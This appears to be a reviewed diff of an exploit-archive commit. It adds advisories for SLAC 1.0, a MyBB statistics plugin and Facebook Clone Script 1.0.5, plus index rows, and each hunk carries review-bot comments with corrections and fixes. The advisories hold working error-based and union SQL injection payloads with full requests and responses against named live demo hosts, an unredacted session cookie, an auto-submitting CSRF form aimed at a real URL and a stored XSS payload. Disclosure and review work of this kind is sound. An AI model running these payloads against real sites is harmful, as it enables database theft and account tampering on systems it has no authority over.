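Review bot: the `# Desc:` wording ("exploited by malicious people to cause a DoS ... via a specially crafted file") is not supported by the report that follows it. LeakSanitizer reports 567 bytes in two allocations still live at process exit: the 512-byte `calloc(512, 1)` at `cmdline.c:132` (`getopt_desc` is never freed before `commandline()` returns) and a 55-byte `strdup`, and the invocation is `./barcode -b id:000034,...`, which passes the string as the barcode text with `-b`, not as an input file (the `% Printing barcode for "id:000034,..."` line confirms this). Both leaks happen on any command line, the amount is fixed, and the memory is reclaimed when the process exits, so there is no way to grow it and no denial of service; this is a code-quality defect (a missing `free(getopt_desc)` on every return path of `commandline()`) and should be described and rated as such. As with the companion buffer-overflow entry, the header lacks a `# Date:` line.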


@ -0,0 +1,85 @@
# # # # #
# Exploit Title: SLAC v1.0: Blind SQL Injection / XPath Injection
# Date: 29-05-2018
# Vendor Homepage: https://sitemakin.com/login-script-demo
# Exploit Author: Divya Jain
# Version: v1.0
# CVE: CVE-2018-11535
# Category: Webapps
# Severity: High
# Tested on: KaLi LinuX_x64
# # # # #
# Proof of Concept:
////////////////////////////////////////////////
SQL Injection in "my_item_search" parameter
////////////////////////////////////////////////
# Affected Link: demo.com/login-script-demo/users.php
# Parameter "my_item_search" is exploitable using xpath injection
# Payload 1:
my_item_search=1337'and extractvalue(5566,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1),0x7e ))-- -
# Payload 2:
my_item_search=1337'and extractvalue(5566,concat(0x7e,(select column_name from information_schema.columns where table_name="access_level" LIMIT 0,1),0x7e ))-- -
# POC 1 (Result: Table_name)
/////////REQUEST//////////
POST /login-script-demo/users.php HTTP/1.1
Host: sitemakin.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://demo.com/login-script-demo/users.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 171
Cookie: PHPSESSID=57a62feb015f8912f7eaa856166343db; _ga=GA1.2.496857143.1527491400; _gid=GA1.2.909440178.1527491400; _gat=1
Connection: close
Upgrade-Insecure-Requests: 1
my_item_search=1337'and extractvalue(5566,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1),0x7e ))-- -&submit=Search
/////////RESPONSE//////////
<form method="post" action="/login-script-demo/users.php">
<select class="new-url2 form-control" name="my_item">
<br />
<b>Warning</b>: PDOStatement::execute(): SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~access_level~' in <b>/home/sitemakin/public_html/login-script-demo/includes/post_users.inc.php</b> on line <b>33</b><br />
<br />
<b>Warning</b>: main(): SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~access_level~' in <b>/home/sitemakin/public_html/login-script-demo/includes/post_users.inc.php</b> on line <b>34</b><br />
<option value="all">All</option>
# POC 2 (Result: Column_name)
/////////REQUEST//////////
POST /login-script-demo/users.php HTTP/1.1
Host: sitemakin.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://demo.com/login-script-demo/users.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 175
Cookie: PHPSESSID=57a62feb015f8912f7eaa856166343db; _ga=GA1.2.496857143.1527491400; _gid=GA1.2.909440178.1527491400; _gat=1
Connection: close
Upgrade-Insecure-Requests: 1
my_item_search=1337'and extractvalue(5566,concat(0x7e,(select column_name from information_schema.columns where table_name="access_level" LIMIT 0,1),0x7e ))-- -&submit=Search
/////////RESPONSE//////////
<form method="post" action="/login-script-demo/users.php">
<select class="new-url2 form-control" name="my_item">
<br />
<b>Warning</b>: PDOStatement::execute(): SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~id~' in <b>/home/sitemakin/public_html/login-script-demo/includes/post_users.inc.php</b> on line <b>33</b><br />
<br />
<b>Warning</b>: main(): SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~id~' in <b>/home/sitemakin/public_html/login-script-demo/includes/post_users.inc.php</b> on line <b>34</b><br />
<option value="all">All</option>
################################################################################
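Review bot: the classification in the title (`Blind SQL Injection / XPath Injection`) does not match the technique shown: both payloads use MySQL's `extractvalue()` to force an error that carries a query result, which is error-based SQL injection, and the `XPATH syntax error` text in the responses is MySQL's error message, not evidence of XPath injection in the application, so the title and the `Parameter "my_item_search" is exploitable using xpath injection` line should be corrected. The responses also show `PDOStatement::execute()` failing with `display_errors` enabled, leaking the absolute path `/home/sitemakin/public_html/login-script-demo/includes/post_users.inc.php`; the advisory gives no fix, and the two relevant ones are binding `my_item_search` as a PDO parameter instead of concatenating it into the query, and turning `display_errors` off in production. Target consistency: `Affected Link` and `Referer` use `demo.com` while both requests carry `Host: sitemakin.com`, so the hunk documents testing against the vendor's live demo site, and the captured `Cookie:` line contains a real `PHPSESSID` and analytics identifiers that should be redacted before publication.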


@ -0,0 +1,25 @@
# Exploit Title: MyBB ChangUonDyU Advanced Statistics Plugin v1.0.2 - Cross-Site Scripting
# Date: 5/25/2018
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://community.mybb.com/mods.php?action=view&pid=1125
# Version: 1.0.2
# Tested on: Ubuntu 18.04
# CVE: CVE-2018-11532
1. Description:
This plugin displays advanced statistics on the index page such as latest posts with auto refresh using AJAX.
2. Proof of Concept:
Create a new thread with the following payload as the title <svg onload=alert('XSS')>
The alert will appear on the index page
3. Solution:
Update to the latest release
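Review bot: the entry never says where the unescaped output is, which makes it hard to confirm or to fix. The description says the plugin renders latest posts on the index page via AJAX refresh and the PoC is a thread title containing `<svg onload=alert('XSS')>`, so the missing sentence is that the thread title is emitted into the index page markup without HTML encoding, a stored XSS reachable by any account that can create a thread. `3. Solution: Update to the latest release` should name the fixed plugin version, since `Version: 1.0.2` is given as affected and a reader cannot otherwise tell whether a later 1.0.x is safe; if no fixed release exists, say so and give the code-level workaround (pass the title through MyBB's `htmlspecialchars_uni()` before output).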


@ -0,0 +1,46 @@
# Exploit Title: Facebook Clone Script 1.0.5 - 'search' SQL Injection
# Date: 2018-05-29
# Exploit Author: L0RD
# Vendor Homepage: https://www.phpscriptsmall.com/product/facebook-clone/
# Version: 1.0.5
# Tested on: Win 10
# POC : SQLi :
# Parameter : search
# Type : Union based
# Payload :
1' UNION SELECT NULL,group_concat(table_name,0x3a,column_name),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
from information_schema.columns where table_schema=schema()#
# Request
POST /demo/fbclone/top-search.php HTTP/1.1
Host: smsemailmarketing.in
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0)
Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://smsemailmarketing.in/demo/fbclone/setting.php
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 231
Connection: keep-alive
search=1' UNION SELECT NULL,group_concat(table_name,0x3C62723E,column_name),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
from information_schema.columns where table_schema=schema()#
# Response
HTTP/1.1 200 OK
Server: nginx/1.12.2
Date: Tue, 29 May 2018 17:12:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Content-Length: 5370
<a href='friend-profile.php?id='><img src="images/unknown.jpeg"
height="40px"
width="40px">About_you:a_id,about_you:u_id,about_you:u_nick,about_you:u_nickname,about_you:u_nick_show,about_you:nick_privacy,admin:id,admin:name,admin:username,admin:password,admin:ref_password,admin:sex,admin:email_id,admin:valid_id,admin:user_type,admin:user_level,admin:city_code,admin:state_code,admin:country_code,admin:userimages,admin:description
</a></div>
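Review bot: the payload is given in two different forms and the request/response pair does not correspond to the same one: the `# Payload :` block uses `0x3a` as the separator, the request body uses `0x3C62723E` (`<br>`), and the response at the bottom shows colon-separated output; pick one payload and show its matching response. The request carries no `Cookie:` header while `Referer: .../setting.php` suggests a logged-in session, so the entry should state whether `top-search.php` is reachable without authentication, which changes the severity. The `User-Agent:` header is wrapped onto two lines (`... rv:61.0)` / `Gecko/20100101 Firefox/61.0`), which is an invalid request if copied verbatim. No fix line is given; the remediation is a prepared statement for the `search` parameter.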


@ -0,0 +1,28 @@
# Exploit Title: Facebook Clone Script 1.0.5 - Cross-Site Request Forgery
# Date: 2018-05-29
# Exploit Author: L0RD
# Vendor Homepage: https://www.phpscriptsmall.com/product/facebook-clone/
# Version: 1.0.5
# Tested on: Win 10
# Description :
# Facebook Clone Script 1.0.5 has csrf vulnerability which attacker can
# easily change user information .
# POC :
<html>
<head>
<title>Change information</title>
</head>
<body>
<form action="http://smsemailmarketing.in/demo/fbclone/setting.php" method="POST">
<input type="hidden" name="fn" value="anything" />
<input type="hidden" name="ln" value="anything" />
<input type="hidden" name="chnname" value="anything" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
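Review bot: the write-up asserts the CSRF but shows no evidence that `setting.php` lacks a token or an origin check; a capture of the legitimate settings request, showing that no anti-CSRF field is present and which profile fields `fn`, `ln` and `chnname` map to, would make the finding verifiable and would document the impact beyond "change user information". The PoC hard-codes the vendor's demo host (`http://smsemailmarketing.in/demo/fbclone/setting.php`); replace it with a placeholder so the committed file does not point at a third-party site. No fix is given; the standard ones are a per-session synchronizer token validated on `setting.php` and a `SameSite` attribute on the session cookie. Style: the description sentence "has csrf vulnerability which attacker can easily change user information ." needs the articles and the stray space before the period fixed.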


@ -9746,6 +9746,8 @@ id,file,description,date,author,type,platform,port
44750,exploits/linux/local/44750.txt,"GNU glibc < 2.27 - Local Buffer Overflow",2018-05-24,JameelNabbo,local,linux, 44750,exploits/linux/local/44750.txt,"GNU glibc < 2.27 - Local Buffer Overflow",2018-05-24,JameelNabbo,local,linux,
44776,exploits/android/local/44776.txt,"Werewolf Online 0.8.8 - Information Disclosure",2018-05-27,ManhNho,local,android, 44776,exploits/android/local/44776.txt,"Werewolf Online 0.8.8 - Information Disclosure",2018-05-27,ManhNho,local,android,
44787,exploits/windows_x86/local/44787.py,"ALFTP 5.31 - Local Buffer Overflow (SEH Bypass)",2018-05-28,"Gokul Babu",local,windows_x86, 44787,exploits/windows_x86/local/44787.py,"ALFTP 5.31 - Local Buffer Overflow (SEH Bypass)",2018-05-28,"Gokul Babu",local,windows_x86,
44797,exploits/linux/local/44797.txt,"GNU Barcode 0.99 - Buffer Overflow",2018-05-29,LiquidWorm,local,linux,
44798,exploits/linux/local/44798.txt,"GNU Barcode 0.99 - Memory Leak",2018-05-29,LiquidWorm,local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
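Review bot: the two rows inserted in this hunk (`44797` and `44798`, both `GNU Barcode 0.99`) carry `2018-05-29` as the date, but the corresponding advisory files in this commit have no `# Date:` header at all, so the date cannot be checked against the source; the files should gain a date line that agrees with the CSV. The `local,linux` classification is also questionable for `44798`: the file documents a fixed 567-byte leak that LeakSanitizer reports at process exit, which is a code-quality defect rather than an exploitable local condition, and the row's description should reflect that. Rendering note for whoever regenerates this page: each context line appears twice on one line (`44750,... 44750,...`), which is a two-column diff view flattened by the extractor, not content of files.csv.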
@ -39461,3 +39463,10 @@ id,file,description,date,author,type,platform,port
44788,exploits/php/webapps/44788.html,"Joomla! Component jCart for OpenCart 2.3.0.2 - Cross-Site Request Forgery",2018-05-28,L0RD,webapps,php, 44788,exploits/php/webapps/44788.html,"Joomla! Component jCart for OpenCart 2.3.0.2 - Cross-Site Request Forgery",2018-05-28,L0RD,webapps,php,
44789,exploits/php/webapps/44789.html,"Joomla! Component JoomOCShop 1.0 - Cross-Site Request Forgery",2018-05-28,L0RD,webapps,php, 44789,exploits/php/webapps/44789.html,"Joomla! Component JoomOCShop 1.0 - Cross-Site Request Forgery",2018-05-28,L0RD,webapps,php,
44790,exploits/php/webapps/44790.txt,"wityCMS 0.6.1 - Cross-Site Scripting",2018-05-28,"Nathu Nandwani",webapps,php, 44790,exploits/php/webapps/44790.txt,"wityCMS 0.6.1 - Cross-Site Scripting",2018-05-28,"Nathu Nandwani",webapps,php,
44792,exploits/asp/webapps/44792.txt,"IssueTrak 7.0 - SQL Injection",2018-05-29,"Chris Anastasio",webapps,asp,
44793,exploits/php/webapps/44793.txt,"Sitemakin SLAC 1.0 - 'my_item_search' SQL Injection",2018-05-29,"Divya Jain",webapps,php,
44794,exploits/hardware/webapps/44794.txt,"NUUO NVRmini2 / NVRsolo - Arbitrary File Upload",2018-05-29,M3@Pandas,webapps,hardware,
44795,exploits/php/webapps/44795.txt,"MyBB ChangUonDyU Plugin 1.0.2 - Cross-Site Scripting",2018-05-29,0xB9,webapps,php,
44796,exploits/java/webapps/44796.txt,"Pivotal Spring Java Framework < 5.0 - Remote Code Execution",2018-05-29,JameelNabbo,webapps,java,
44799,exploits/php/webapps/44799.txt,"Facebook Clone Script 1.0.5 - 'search' SQL Injection",2018-05-29,L0RD,webapps,php,
44800,exploits/php/webapps/44800.txt,"Facebook Clone Script 1.0.5 - Cross-Site Request Forgery",2018-05-29,L0RD,webapps,php,
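Review bot: the seven rows added here all carry `2018-05-29`, the publication date, while the `# Date:` headers inside the files disagree with the CSV and with each other in format: `05-28-2018` (IssueTrak), `2018-05-20` (NUUO), `29-05-2018` (SLAC), `5/25/2018` (MyBB), `2018-05-28` (Spring). If the CSV column means "published" rather than "discovered" that is fine, but the in-file dates should use one format (ISO 8601) so the two can be compared. Title/version mismatch for `44796`: the CSV says `Pivotal Spring Java Framework < 5.0` while the file's `# Version:` line says `<= 5.0.x`; whichever is corrected, the two should agree. For `44793` the CSV title (`'my_item_search' SQL Injection`) is more accurate than the file's own `Blind SQL Injection / XPath Injection` title, since the file shows error-based SQL injection via MySQL `extractvalue()`; keep the CSV wording and fix the file header rather than the other way round.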
